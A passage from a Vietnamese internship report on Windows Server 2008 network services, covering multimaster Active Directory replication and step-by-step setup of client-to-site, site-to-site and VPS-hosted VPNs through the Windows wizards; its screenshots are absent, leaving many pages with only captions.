Khả năng cập nhật đa chủ cung cấp tính sẵn sàng cao của ghi vào đối tượng thư mục bởi vì một số máy chủ có thể chứa các bản sao có thể ghi của một đối tượng. Mỗi bộ điều khiển miền trong phạm vi có thể chấp nhận thông tin cập nhật một cách độc lập, không giao tiếp với bộ điều khiển tên miền khác. Hệ thống giải quyết bất kỳ cuộc xung đột trong bản cập nhật cho một đối tượng thư mục cụ thể. Nếu cập nhật hết và sao chép tiếp tục, tất cả các bản sao của một đối tượng cuối cùng đạt được giá trị như nhau.
Cách thức mà các cửa hàng dịch vụ một thư mục thông tin trực tiếp xác định hiệu suất và khả năng mở rộng của dịch vụ thư mục. Dịch vụ thư mục phải xử lý một số lượng lớn các truy vấn so với số lượng các bản cập nhật thì phải xử lý. Một tỷ lệ điển hình của các truy vấn để cập nhật là 99:1. Bằng cách tạo ra nhiều bản sao
119Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
của thư mục và giữ bản sao phù hợp, các dịch vụ thư mục có thể xử lý nhiều truy vấn mỗi giây.
Sao chép đa cung cấp những ưu điểm sau hơn sao chép đơn tổng thể:
Nếu một domain controller trở nên không thể hoạt động, bộ điều khiển tên miền khác có thể tiếp tục cập nhật các thư mục. Trong sao chép đơn-master, nếu bộ điều khiển tên miền chính trở nên không thể hoạt động, cập nhật thư mục có thể không diễn ra. Ví dụ, nếu máy chủ không giữ mật khẩu và mật khẩu của bạn đã hết hạn, bạn có thể không thiết lập lại mật khẩu của bạn và do đó bạn không thể đăng nhập vào tên miền.
Các máy chủ có khả năng làm thay đổi thư mục, mà trong Windows 2000 là bộ điều khiển miền, có thể được phân phối trên mạng và có thể được đặt tại nhiều địa điểm vật lý.
II. cấu hình Multimaster.
1. chuẩn bị.- 2 máy server windows 2008
- 1 PC có domain: Athena.edu.vn. ip : 192.168.1.1
- 1PC chưa domain. Ip: 192.168.1.2
2. cấu hình.PC 1
120Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
PC 2
3. join domain PC2 vào PC1.Tiến hành join domain từ PC2 vào PC1 với domain là Athena.edu.vn.
Mở computer -> properties .
121Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Changes setting.
122Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Nhập vào:
Computer name: multimaster
Domain: Athena.edu.vn.
Ok.
123Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
124Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Nhập quyền administrator và pass vào.
Nhấp OK.
125Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Nhấp OK.
Khởi động lại máy.
126Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
3. tiến hành nâng cấp domain cho PC1.Vào start -> run -> dcpromo.
127Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next
128Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next.
Trong hộp thoại Active Directory Domain Services Installation Wizard -> chọn Exting format.
129Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn set-> nhập quyền admin vào.
Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next.
130Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next.
Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next
131Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Yes.
Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next.
132Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Active Directory Domain Services Installation Wizard -> nhập pass vào.
Trong hộp thoại Active Directory Domain Services Installation Wizard -> Next.
133Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Active Directory Domain Services Installation Wizard -> check vào Reboot on completion.
Khởi động lại máy.
134Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
4. Kiểm tra đồng bộ PC2 và PC1.PC1.
135Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
PC2.
136Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
CHƯƠNG 12: TRIỂN KHAI VPN
I. Tìm hiểu VPNGiải pháp VPN (Virtual Private Network) được thiết kế cho những tổ chức
có xu hướng tăng cường thông tin từ xa vì địa bàn hoạt động rộng (trên toàn quốc hay toàn cầu). Tài nguyên ở trung tâm có thể kết nối đến từ nhiều nguồn nên tiết kiệm được được chi phí và thời gian.
Một mạng VPN điển hình bao gồm mạng LAN chính tại trụ sở (Văn phòng chính), các mạng LAN khác tại những văn phòng từ xa, các điểm kết nối (như 'Văn phòng' tại gia) hoặc người sử dụng (Nhân viên di động) truy cập đến từ bên ngoài.
137Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
1. Khái niệm.Mạng riêng ảo hay VPN (Virtual Private Network) là một mạng dành riêng
để kết nối các máy tính lại với nhau thông qua mạng Internet công cộng. Những máy tính tham gia mạng riêng ảo sẽ "nhìn thấy nhau" như trong một mạng nội bộ - LAN (Local Area Network).
Internet là một môi trường công cộng, việc chia sẻ dữ liệu có tính riêng tư thông qua Internet là cực kỳ nguy hiểm vì những dữ liệu đó có thể dễ dàng bị rò rỉ, bị ăn cắp... Mạng riêng ảo là giao thức trợ giúp việc kết nối các máy tính lại với nhau thông qua một kênh truyền dẫn dữ liệu (tunel) riêng đã được mã hóa.
Mạng riêng ảo giúp bảo vệ dữ liệu trong khi chúng được truyền trên Internet vì vậy mạng riêng ảo thường được ứng dụng trong các trường hợp sau:
Làm việc từ xa: Truy cập từ xa thông qua Internet vào mạng của công ty để chia sẻ dữ liệu cũng như thực thi các ứng dụng nội bộ.
Kết nối nhiều mạng với nhau (Site-to-Site): Nếu công ty có nhiều văn phòng, việc kết nối các mạng lại với nhau thành một mạng thống nhất sẽ đem lại hiệu quả ấn tượng trong việc quản lý & chia sẻ thông tin.
Tạo phiên làm việc an toàn: Mạng riêng ảo là giải pháp tốt & với chi phí thấp cho một số công việc đòi hỏi tính bảo mật cao như quản trị máy chủ, website, cơ sở dữ liệu...
Nếu thường xuyên làm việc trên Internet & thông tin là tài sản vô giá, bạn nên ứng dụng mạng riêng ảo vào công việc của mình.
138Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
2. Các loại VPN.Có hai loại phổ biến hiện nay là VPN truy cập từ xa (Remote-Access ) và
VPN điểm-nối-điểm (site-to-site)
VPN truy cập từ xa còn được gọi là mạng Dial-up riêng ảo (VPDN), là một kết nối người dùng-đến-LAN, thường là nhu cầu của một tổ chức có nhiều nhân viên cần liên hệ với mạng riêng của mình từ rất nhiều địa điểm ở xa. Ví dụ như công ty muốn thiết lập một VPN lớn phải cần đến một nhà cung cấp dịch vụ doanh nghiệp (ESP). ESP này tạo ra một máy chủ truy cập mạng (NAS) và cung cấp cho những người sử dụng từ xa một phần mềm máy khách cho máy tính của họ. Sau đó, người sử dụng có thể gọi một số miễn phí để liên hệ với NAS và dùng phần mềm VPN máy khách để truy cập vào mạng riêng của công ty. Loại VPN này cho phép các kết nối an toàn, có mật mã.
Hình minh họa cho thấy kết nối giữa Văn phòng chính và "Văn phòng" tại gia hoặc nhân viên di động là loại VPN truy cập từ xa).
VPN điểm-nối-điểm là việc sử dụng mật mã dành cho nhiều người để kết nối nhiều điểm cố định với nhau thông qua một mạng công cộng như Internet. Loại này có thể dựa trên Intranet hoặc Extranet. Loại dựa trên Intranet: Nếu một công ty có vài địa điểm từ xa muốn tham gia vào một mạng riêng duy nhất, họ có thể tạo ra một VPN intranet (VPN nội bộ) để nối LAN với LAN. Loại dựa trên Extranet: Khi một công ty có mối quan hệ mật thiết với một công ty khác (ví dụ như đối tác cung cấp, khách hàng...), họ có thể xây dựng một VPN extranet (VPN mở rộng) kết nối LAN với LAN để nhiều tổ chức khác nhau có thể làm việc trên một môi trường chung.
Trong hình minh họa trên, kết nối giữa Văn phòng chính và Văn phòng từ xa là loại VPN Intranet, kết nối giữa Văn phòng chính với Đối tác kinh doanh là VPN Extranet.
3.Bảo mật trong VPNTường lửa (firewall) là rào chắn vững chắc giữa mạng riêng và Internet. Bạn
có thể thiết lập các tường lửa để hạn chế số lượng cổng mở, loại gói tin và giao thức được chuyển qua. Một số sản phẩm dùng cho VPN như router 1700 của Cisco có thể nâng cấp để gộp những tính năng của tường lửa bằng cách chạy hệ điều hành Internet Cisco IOS thích hợp. Tốt nhất là hãy cài tường lửa thật tốt trước khi thiết lập VPN.
139Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Mật mã truy cập là khi một máy tính mã hóa dữ liệu và gửi nó tới một máy tính khác thì chỉ có máy đó mới giải mã được. Có hai loại là mật mã riêng và mật mã chung.
Mật mã riêng (Symmetric-Key Encryption): Mỗi máy tính đều có một mã bí mật để mã hóa gói tin trước khi gửi tới máy tính khác trong mạng. Mã riêng yêu cầu bạn phải biết mình đang liên hệ với những máy tính nào để có thể cài mã lên đó, để máy tính của người nhận có thể giải mã được.
Mật mã chung (Public-Key Encryption) kết hợp mã riêng và một mã công cộng. Mã riêng này chỉ có máy của bạn nhận biết, còn mã chung thì do máy của bạn cấp cho bất kỳ máy nào muốn liên hệ (một cách an toàn) với nó. Để giải mã một message, máy tính phải dùng mã chung được máy tính nguồn cung cấp, đồng thời cần đến mã riêng của nó nữa. Có một ứng dụng loại này được dùng rất phổ biến là Pretty Good Privacy (PGP), cho phép bạn mã hóa hầu như bất cứ thứ gì.
Giao thức bảo mật giao thức Internet (IPSec) cung cấp những tính năng an ninh cao cấp như các thuật toán mã hóa tốt hơn, quá trình thẩm định quyền đăng nhập toàn diện hơn.
IPSec có hai cơ chế mã hóa là Tunnel và Transport. Tunnel mã hóa tiêu đề (header) và kích thước của mỗi gói tin còn Transport chỉ mã hóa kích thước. Chỉ những hệ thống nào hỗ trợ IPSec mới có thể tận dụng được giao thức này. Ngoài ra, tất cả các thiết bị phải sử dụng một mã khóa chung và các tường lửa trên mỗi hệ thống phải có các thiết lập bảo mật giống nhau. IPSec có thể mã hóa dữ liệu giữa nhiều thiết bị khác nhau như router với router, firewall với router, PC với router, PC với máy chủ.
Máy chủ AAA
AAA là viết tắt của ba chữ Authentication (thẩm định quyền truy cập), Authorization (cho phép) và Accounting (kiểm soát). Các server này được dùng để đảm bảo truy cập an toàn hơn. Khi yêu cầu thiết lập một kết nối được gửi tới từ máy khách, nó sẽ phải qua máy chủ AAA để kiểm tra. Các thông tin về những hoạt động của người sử dụng là hết sức cần thiết để theo dõi vì mục đích an toàn.
4.Sản phẩm công nghệ dành cho VPNTùy vào loại VPN (truy cập từ xa hay điểm-nối-điểm), bạn sẽ cần phải cài
đặt những bộ phận hợp thành nào đó để thiết lập mạng riêng ảo. Đó có thể là:
140Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
- Phần mềm cho desktop của máy khách dành cho người sử dụng từ xa.
- Phần cứng cao cấp như bộ xử lý trung tâm VPN hoặc firewall bảo mật PIX.
- Server VPN cao cấp dành cho dịch vụ Dial-up.
- NAS (máy chủ truy cập mạng) do nhà cung cấp sử dụng để phục vụ người sử dụng từ xa.
- Mạng VPN và trung tâm quản lý.
5. Bộ xử lý trung tâm VPNCó nhiều loại máy xử lý VPN của các hãng khác nhau, nhưng sản phẩm của
Cisco tỏ ra vượt trội ở một số tính năng. Tích hợp các kỹ thuật mã hóa và thẩm định quyền truy cập cao cấp nhất hiện nay, máy xử lý VPN được thiết kế chuyên biệt cho loại mạng này. Chúng chứa các module xử lý mã hóa SEP, cho phép người sử dụng dễ dàng tăng dung lượng và số lượng gói tin truyền tải. Dòng sản phẩm có các model thích hợp cho các mô hình doanh nghiệp từ nhỏ đến lớn (từ100 cho đến 10.000 điểm kết nối từ xa truy cập cùng lúc).
Bộ xử lý trung tâm VPN số hiệu 3000 của hãng Cisco.
6. Router dùng cho VPNThiết bị này cung cấp các tính năng truyền dẫn, bảo mật. Dựa trên hệ điều
hành Internet IOS của mình, hãng Cisco phát triển loại router thích hợp cho mọi trường hợp, từ truy cập nhà-tới-văn phòng cho đến nhu cầu của các doanh nghiệp quy mô lớn.
7. Tường lửa PIX của CiscoFirewall trao đổi Internet riêng (Private Internet Exchange) bao gồm một cơ
chế dịch địa chỉ mạng rất mạnh, máy chủ proxy, bộ lọc gói tin, các tính năng VPN và chặn truy cập bất hợp pháp.
141Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Thay vì dùng IOS, thiết bị này có hệ điều hành với khả năng tổ chức cao, xoay sở được với nhiều giao thức, hoạt động rất mạnh bằng cách tập trung vào IP.
II. VPN client to site.
1. Cài đặt.Start -> Administrative Tools -> Routing and Remote Access. Trong hộp thoại này chạy Configure and Enable routing and remote access.
Trong routing and remote access server setup wizad -> Next.
142Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong routing and remote access server setup wizad -> chọn Custum configuration.
143Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong routing and remote access server setup wizad -> chọn VPN access và LAN routing.
Trong routing and remote access server setup wizad -> nhấn Fisnish.
144Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Khởi chạy routing.
Trong routing and remote access server setup wizad -> chọn Fisnish.
145Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong routing and remote access -> chọn Properties.
146Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Ta tiến hành add thêm IP cho routing.
147Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
148Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tiến hành tạo use. Start -> Administrative Tools-> Active Directory…
149Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn new tạo user mới.
150Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Tạo user có tên hien 123 và password.
151Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Kiểm tra Active Directory Users and Computers đã tạo thành công.
152Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Active Directory Users and Computers -> Properties user vừa tạo.
Chọn Allow Access.
153Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Windows 7 vào Netword and Sharing Center.
154Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
155Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
156Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
157Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
158Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Sau khi hoàn thành đăng nhập user vừa tạo trên windows 7.
159Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
160Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
161Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
III.VPN SITE TO SITE
1. chuẩn bị: - 2 windows server 2008
-2 windows 2007
+ máy PC 1 windows 2007 co ip 192.168.1.2. máy này sẻ ping thông với PC 2 là windows server 2008 có địa chỉ ip là 192.168.1.1.
+ máy PC 3 windows 2007 co ip 192.168.2.2 máy này sẻ ping thông với PC 4 là windows server 2008 có địa chỉ ip là 192.168.2.1.
2. Đặt IP cho 4 máyMáy PC 1
162Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Máy PC 2
Máy PC 3
163Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Máy PC 4
3. Tiến hành cấu hình trên 2 server.Trên server 1 ( PC 2).
164Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
165Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trên server 2 ( PC3).
166Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
167Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Khởi động Routing and Remote Access
168Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Routing and Remote Access -> Alls Task -> Star.
169Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Routing and Remote Access ->Configure and Enable ….
Trong Routing and Remote Access Service Setup Wizard -> Next.
170Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Routing and Remote Access Service Setup Wizard -> Custom…
Trong Routing and Remote Access Service Setup Wizard chọn VPN access, Demand-dial connections và Lan routing.
171Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Routing and Remote Access Service Setup Wizard -> Finish.
Trong Routing and Remote Access -> Start servise.
Trong Routing and Remote Access -> chuột phải Netword -> new Demand…
172Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Next.
173Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
174Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
175Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
176
Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Finish.
Click Porperties.
177Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
178Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Bên server 2( PC 3) cũng làm tương tự như server 1(PC2).
179Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Routing and Remote Access Service Setup Wizard -> Next
Trong Routing and Remote Access Service Setup Wizard -> Custom…
180Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong Routing and Remote Access Service Setup Wizard -> tick VPN, Demand.. và Lan routing.
Trong Routing and Remote Access -> New…
181Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Click Next.
182Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
183Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
184Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
185Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
186Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
187Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
188Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
189Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Bên server 1.
190Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Bên server 2.
191Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
4. Kiểm tra.Lúc này từ PC1 sẻ ping thông qua PC4.
CHƯƠNG 13: TRIỂN KHAI VPN TRÊN VPS
I. Cấu hình VPN.Start -> Administrative Tools -> Ruoting and Remote Access.
Chuột phải chọn Config ….192
Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard -> Next.
Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard -> Custom Configuration.
193Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard-> chọn VPN access và LAN ruoting.
Trong hộp thoại Ruoting and Remote Access. Server Setup Wizard -> Next
194Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Propesties.
Chọn Static addess pool.
195Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Add IP vào.
Tiến hành tạo User thuhien1 và thuhien2.
196Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
197Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Chọn Allow access.
Chọn Properties.
Chọn Allow Access.
198Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
II. Cài đặt VPN cho client.
1. Client xp1.Trên máy ảo windows XP1. Trong hộp thoãi New Connection Wizard -> chọn Crea….
199Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoãi New Connection Wizard -> Next
Trong hộp thoãi New Connection Wizard-> Connect to the network at my wordplaces-> Next.
200Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoãi New Connection Wizard -> Viatual Privale Netword connection. -> Next.
Trong hộp thoãi New Connection Wizard -> nhập Company Name: client 1 den vps
201Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoãi New Connection Wizard -> nhập Ip của VPS: 14.0.21.222.
Trong hộp thoãi New Connection Wizard -> chọn Anyone use.
202Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trong hộp thoãi New Connection Wizard -> tick vào Add a shortcut the connection to my desktop -> Fisnish.
Sau khi hoàn thành sẻ đăng nhập vào user name và password -> Connect.
203Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP
Trên VPN vừa tạo chuột phải chọn Status.
IP VPS cấp là 10.0.0.101.
204Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008
